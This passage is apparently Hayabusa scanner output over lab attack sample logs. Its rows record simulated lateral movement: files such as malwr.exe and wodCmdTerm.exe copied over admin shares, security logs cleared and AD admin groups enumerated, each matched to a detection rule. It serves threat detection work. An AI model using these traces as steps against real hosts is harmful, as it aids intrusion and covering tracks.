\\*\C$ : Share Path: \??\C:\ : File: Users\user04\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Music : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:27.061 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:27.071 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: ui\SwDRM.dll : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:45.488 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Default\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:56.403 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share 
Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:56.414 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\AppData : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:58.386 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:04.105 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Fonts\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Media\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:07.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:07.630 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:07.700 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\setup.bat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\setup.bat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:09.923 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:09.933 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\ui\SwDRM.dll : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:10.063 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-19 07:15:36.036 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55585 : LogonID: 
0x10fac2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx -2019-03-19 07:15:49.583 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49244 : LogonID: 0x10fbcc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx -2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x10fbeb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx -2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x10fc09,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx -2019-03-19 07:15:49.692 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: user01 : Workstation: : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x110085,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx -2019-03-19 08:23:37.147 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:43.570 
+09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55872 : LogonID: 0x15e162,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:52.491 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: user01 : Workstation: : IP Address: 10.0.2.17 : Port: 49222 : LogonID: 0x15e1a7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:52.507 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: user01 : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance 
Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55873 : LogonID: 0x15e25f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: WIN-77LTAPHIQ1R$ : Share Name: \\*\SYSVOL : Share Path: \??\C:\Windows\SYSVOL\sysvol : IP Address: fe80::79bf:8ee2:433c:2567,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance 
Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:15.647 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation WIN-77LTAPHIQ1R : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 09:02:00.383 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.179 
+09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: NULL : IP Address: 10.0.2.17 : Port: 49236 : LogonID: 0x17e29a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49236 : LogonID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 
0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49237 : LogonID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.257 